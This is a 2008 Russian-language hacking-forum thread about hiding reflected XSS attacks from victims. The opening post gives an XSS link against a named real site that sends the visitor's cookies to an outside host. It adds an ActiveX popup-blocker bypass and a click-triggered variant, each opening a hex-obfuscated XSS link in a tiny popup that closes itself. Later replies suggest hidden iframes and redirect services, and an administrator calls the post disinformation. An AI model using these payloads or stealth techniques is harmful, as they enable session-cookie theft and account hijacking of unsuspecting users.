ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Маскировка пассивных Xss
  #1  
Старый 07.04.2008, 18:16
Аватар для ZET36
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748

Репутация: 137
По умолчанию Маскировка пассивных Xss

И так разработкой данного метода маскировки меня сподвигла
огромная актуальность пассивных xss уязвимостей . как минимум каждый 2рой сайт в рунете уязвим

но вот загвоздка этих атак заключается в там что не каждый юзер пойдёт по ссылке типа

Код:
http://irc.run.net/cgi-bin/irc.cgi?item=fmain&interface=ie&style=gothic<script>img = new Image(); img.src = "http://antichat.org/s/red.gif?"+document.cookie;</script>
да и перенапрвление не даёт должной беспаливности так как оказываясь перенаправленным юзер конешно увидит url .
идеальным бы казалось спрятать страницу с хсс в невидимый фрэйм. но вот куки с него неидут так как фрэйм находится на другом домене

остались всплывающие окна. конешно не идеальный вариант маскировки но всёрвно неплохой (например заходит жертва на нашу страницу вылетает маленькое окошко 1 на 1 . автоматом он думает что это реклама и закрывает его темболее в следующих скриптах приведён пример самостоятельного закрытия этого окошка при передаче куков)


но есть одно НО во всех браузерах есть предупреждение всплывающих окон а у некоторых они отключены вообще

в принципе обход блокировки сплывающих окон в ie можно обойти с помощью ActiveX

Код:
<object id=x classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A width=1 height=1 align=middle> 
<PARAM NAME=ActivateApplets VALUE=1><PARAM NAME=ActivateActiveXControls VALUE=1></object> 
<SCRIPT> 

function shellscript() 
{ 
var xss_site = unescape("%68%74%74%70%3A%2F%2F%69%72%63%2E%6B%67%74%73%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%69%72%63%2E%63%67%69%3F%69%74%65%6D%3D%66%6D%61%69%6E%26%69%6E%74%65%72%66%61%63%65%3D%69%65%26%73%74%79%6C%65%3D%67%6F%74%68%69%63%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E");

msgWindow=open(xss_site,"rastabzc","width=1,height=1'");
setTimeout('   msgWindow.close()   ',4000) 
} 

function main() 
{ 
	x.DOM.Script.execScript(shellscript.toString()); 
	x.DOM.Script.setTimeout("shellscript()"); 
} 

if (window.rasta!=true) { 
	setTimeout('   main()   ',100) 
} 
</script>
где в переменной xss_site зашифрованным в unescape содержится ссылка с xss (просто взял в пример алерт
http://irc.kgts.ru/cgi-bin/irc.cgi?item=fmain&interface=ie&style=gothic"><scr ipt>alert(1)</script>)

но вот в Опере и Лисе ActiveX вообще нету. что же делать?

наверно вы обратили внимание что при механическом клике на ссылку никакой блокировки не всплывает. а вот если функция её вызывает клик автоматом
скажем так

Код:
<form name="f">
<input type="button" name="n" onClick="zet()">
</form>

<script>
document.f.n.click();

function zet()
{
msgWindow=open("http://www.yandex.ru/","rastabzc","width=1,height=1'");
}
</script>
то блокировка всёравно как не жалко присутствует

остаётся только как можно хитрее поступить с механическим кликом (тоесть заставить жертву не только зайти на страницу но ещё и щёлкнуть по ней мышкой)

прибегнем немножко к социнженерии

Код:
<body onclick='zet()'>

<script>
function zet()
{
var xss_site = unescape("%68%74%74%70%3A%2F%2F%69%72%63%2E%6B%67%74%73%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%69%72%63%2E%63%67%69%3F%69%74%65%6D%3D%66%6D%61%69%6E%26%69%6E%74%65%72%66%61%63%65%3D%69%65%26%73%74%79%6C%65%3D%67%6F%74%68%69%63%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E");
msgWindow=open(xss_site,"rastabzc","width=1,height=1'");
setTimeout('   msgWindow.close()   ',4000); 
}
</script>
</body>
помимо этого кода в странице должно быть чтонибуть интересное что бы заставило нажать жертву на кнопку


Но я неочень люблю Соц инженерию (особенно представляться блондинкой с большой грудью просящей посмотреть на фотки.exe или что то в этом роде). хотелось бы сделать атаку как можно автоматизированее

и вот меня осенило что если сделать это механическое нажатие вынужденным ( ну тоесть когда на странице выскакивает алерт или ошибка мы сначало должны его закрыть а потом уже страницу. (закрыть сразу страницу с открытм алертом неполучиться) и собственно что бы её закрыть мы должны по ней щёлкнуть мышью)

вот вам пример вынужденного механического нажатия. кто поможет реализовать этот метод буду очень благодарен
кому интересно прошу развивать тему

Последний раз редактировалось ZET36; 07.04.2008 в 18:19..
 
Ответить с цитированием

  #2  
Старый 07.04.2008, 18:20
Аватар для ~Real F@ck!~
~Real F@ck!~
Постоянный
Регистрация: 09.07.2006
Сообщений: 443
Провел на форуме:
2382453

Репутация: 354
Отправить сообщение для ~Real F@ck!~ с помощью ICQ
По умолчанию

был какой то сайт, там вводиш урл пассивки, он тебе даёт урл переадресации с ихнего сайта на эту пассивку, то есть пассивки в урл незаметно, ну можно правдо определить по урлу на этот сайт.
 
Ответить с цитированием

  #3  
Старый 07.04.2008, 18:36
Аватар для ZET36
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748

Репутация: 137
По умолчанию

Цитата:
Сообщение от ~Real F@ck!~  
был какой то сайт, там вводиш урл пассивки, он тебе даёт урл переадресации с ихнего сайта на эту пассивку, то есть пассивки в урл незаметно, ну можно правдо определить по урлу на этот сайт.
что то непонимаю как такое можно реализовать, простая переадресация всёравно выкидывает юзера на страницу с хсс где он обнаружит что то неладное.
 
Ответить с цитированием

  #4  
Старый 07.04.2008, 18:41
Аватар для +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

ИМХО самое актуальное - это вставлять xss в невидимый ифрейм на поломанном сайте и кинуть ссылку недругу. Так и урла не видно, и можно xss через POST сделать
__________________
 
Ответить с цитированием

  #5  
Старый 07.04.2008, 18:47
Аватар для ZET36
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748

Репутация: 137
По умолчанию

Цитата:
Сообщение от +toxa+  
ИМХО самое актуальное - это вставлять xss в невидимый ифрейм на поломанном сайте и кинуть ссылку недругу. Так и урла не видно, и можно xss через POST сделать
авторизованные куки через ифрэйм как не жаль не будут ийти так как страница с фреймом находится на другом домене.

можеш сам проверить например вставь в фрэйм сайт где у тебя запомнен пароль. ну тоесть при обычном вызове этого сайта ты будеш авторизирован а через фрэйм нет
 
Ответить с цитированием

  #6  
Старый 07.04.2008, 22:13
Аватар для ettee
ettee
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747

Репутация: 5170
По умолчанию

~Real F@ck!~, https://forum.antichat.ru/thread43786.html
ZET36, почему я не верю?
Перестаньте нести дезинформацию в народ.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Сценарии/CMF/СMS 156 07.06.2010 05:01
Темная сторона Xss Constantine Авторские статьи 20 14.06.2008 16:28
Скупка пассивных Xss: до 0.25$ за ссылку. Fan О Работе 64 07.04.2008 16:55
Xss Расширенный межсайтовый скриптинг SNIFF Чужие Статьи 0 24.11.2005 08:08
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ